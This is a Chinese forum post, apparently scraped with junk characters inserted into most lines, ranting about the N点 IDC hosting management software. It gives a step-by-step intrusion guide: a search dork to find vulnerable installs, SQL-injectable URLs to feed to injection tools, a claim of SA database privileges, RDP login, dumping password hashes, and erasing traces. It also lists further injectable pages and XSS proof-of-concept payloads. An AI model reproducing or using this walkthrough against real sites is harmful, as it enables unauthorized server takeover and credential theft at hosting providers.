不得不说N点实在是一个破东西
$ B/ ?+ {$ u6 C: ~, s. a' d就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂
( ]! L' R7 q# x9 l8 l2 Z+ G好吧 抱怨一下就行了 接下来关键的时候到了
8 d& n8 s. N- r4 [$ q5 h首先百度搜索关键字:inurl: (mmdatabase.asp)
8 F7 [4 V* } c5 y; a我随便列举一个: www.xxxx.com
|) j& B! B* S3 d- E修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1
: I& d: U* w; D- y1 j5 d% v; ^扔入NBSI 或者啊D等各种傻逼工具后7 Q" e' d! t4 Y5 e: d& X1 T3 e
你们会看到是SA权限6 Y5 [& k6 |: u- K+ n! f, }% T
果断3389 上去 hash得到administrator密码7 l- j% q* Z: o& k, _3 p* k
擦屁股走人~' R4 o; `& ]' H
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
2 ~ F+ ?& L C8 S8 v: T 5 N1 N. ], b6 ^9 H# Q
再附上其他几个漏洞页面# B% W% o+ Q" w/ D0 v
SQL:8 U8 C8 s J9 N: `3 C5 }/ z
http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=15 {' A7 `0 r6 K% |+ r
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11
5 P3 Y* \* W9 T9 nhttp://www.xxxxxx.com:80/Manage/ ... login.asp&PID=94 K8 s: c0 Q7 [
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
( I# ?) y3 n1 x8 Z' aXSS证明:4 a8 ?, _8 P: @6 G
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
9 r- W6 ]6 Y; G" B5 `5 Rhttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”: f' J/ }+ u( [$ ]: H# T' q2 B
http://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>
+ H2 l( f- p# T0 n/ {由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜) a# O" q# Y& e% {; x
还是星外吧 你们懂的
6 l/ n1 J0 U, T6 X作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?
9 @. b3 Y9 |& `PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉
6 X$ }9 _% Z: [8 O; S——- |